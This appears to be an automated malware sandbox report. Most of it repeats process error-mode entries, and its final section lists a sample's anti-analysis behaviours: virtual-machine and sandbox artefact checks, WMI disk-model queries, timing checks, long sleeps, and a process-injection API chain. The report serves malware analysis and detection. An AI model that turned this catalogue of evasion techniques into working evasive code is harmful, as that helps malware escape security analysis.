Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Contains functionality to compare user and computer (likely to detect sandboxes)
Source: C:\Windows\System32\dllhost.exe Code function: OpenProcess,IsWow64Process,CloseHandle,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,CloseHandle,CloseHandle, 40_2_0000000140001868
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Model FROM Win32_DiskDrive
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Manufacturer, Model FROM Win32_DiskDrive
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Model FROM Win32_DiskDrive
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Manufacturer, Model FROM Win32_DiskDrive
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: powershell.exe, 00000008.00000002.1695772455.00000201D59BB000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: powershell.exe, 00000008.00000002.1695772455.00000201D59BB000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
Contains capabilities to detect virtual machines
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened / queried: VBoxGuest
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened / queried: vmci
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened / queried: HGFS
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened / queried: VBoxTrayIPC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened / queried: \pipe\VBoxTrayIPC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened / queried: VBoxMiniRdrDN
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 38_2_00007FFB4B1036CD rdtsc 38_2_00007FFB4B1036CD
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\dllhost.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4466 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5416 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3295
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2690
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5673
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3213
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 778
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3663
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2339
Source: C:\Windows\System32\winlogon.exe Window / User API: threadDelayed 416
Source: C:\Windows\System32\lsass.exe Window / User API: threadDelayed 366
Source: C:\Windows\System32\svchost.exe Window / User API: threadDelayed 375
Source: C:\Windows\System32\svchost.exe Window / User API: threadDelayed 361
Source: C:\Windows\System32\svchost.exe Window / User API: threadDelayed 357
Source: C:\Windows\System32\svchost.exe Window / User API: threadDelayed 351
Found evasive API chain (may stop execution after accessing registry keys)
Source: C:\Windows\System32\dllhost.exe Evasive API call chain: RegOpenKey,DecisionNodes,ExitProcess
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Evasive API call chain: RegOpenKey,DecisionNodes,ExitProcess
Source: C:\Windows\System32\dllhost.exe Evasive API call chain: RegOpenKey,DecisionNodes,Sleep
Source: C:\Windows\System32\dllhost.exe Evasive API call chain: RegQueryValue,DecisionNodes,ExitProcess
Found evasive API chain checking for process token information
Source: C:\Windows\System32\dllhost.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Found large amount of non-executed APIs
Source: C:\Windows\System32\conhost.exe API coverage: 8.0 %
Source: C:\Windows\System32\winlogon.exe API coverage: 9.0 %
